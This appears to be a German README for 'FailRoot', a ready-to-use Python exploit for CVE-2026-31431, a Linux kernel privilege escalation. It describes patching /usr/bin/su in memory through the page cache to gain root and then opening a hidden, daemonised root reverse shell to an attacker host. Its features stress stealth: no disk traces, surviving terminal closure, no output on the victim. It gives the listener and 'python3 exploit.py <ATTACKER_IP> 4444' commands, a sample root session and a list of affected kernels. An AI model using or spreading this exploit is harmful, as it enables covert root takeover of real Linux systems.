
Waffenfähiger Python-Exploit für CVE-2026-31431, der eine Linux-Kernel-Privilegieneskalation mit einer daemonisierten Root-Reverse-Shell mit vollständigem PTY verknüpft und /usr/bin/su im Speicher patcht.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot ist ein einsatzbereiter Exploit für CVE-2026-31431 — einen Out-of-Bounds-Schreibzugriff im crypto: algif_aead-Subsystem des Linux-Kernels.
Er verknüpft eine Privilegieneskalation mit einer daemonisierten Root-Reverse-Shell mit vollständigem PTY:
AF_ALG + splice() → 4-Byte-Page-Cache-Schreibzugriff → /usr/bin/su patchen → root
Der gesamte Exploit passt in eine Datei. Keine Kompilierung. Keine externen Abhängigkeiten. Keine Spuren auf der Festplatte — die su-Binärdatei wird nur im Speicher gepatcht.
algif_aead + authencesn über mehrere Fallback-Strategien/usr/bin/supty.spawn("/usr/bin/su") → vollständig interaktives Root-TTYDie Reverse-Shell übersteht das Schließen des Terminals (SIGHUP wird ignoriert), zeigt keinerlei Ausgabe auf dem Zielsystem und verbindet sich bis zu 3 Minuten lang mit Wiederholungsversuchen.
# Angreifer — Listener starten:
nc -lvnp 4444
# Ziel — Exploit ausführen (es wird nichts angezeigt, er daemonisiert sofort):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su (auf allen Distributionen weltweit lesbar)algif_aead und authencesn verfügbarsudo erforderlichNur für autorisierte Sicherheitsforschung und Bildungszwecke. Missbrauch ist illegal.
| Von | Bis (exklusiv) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |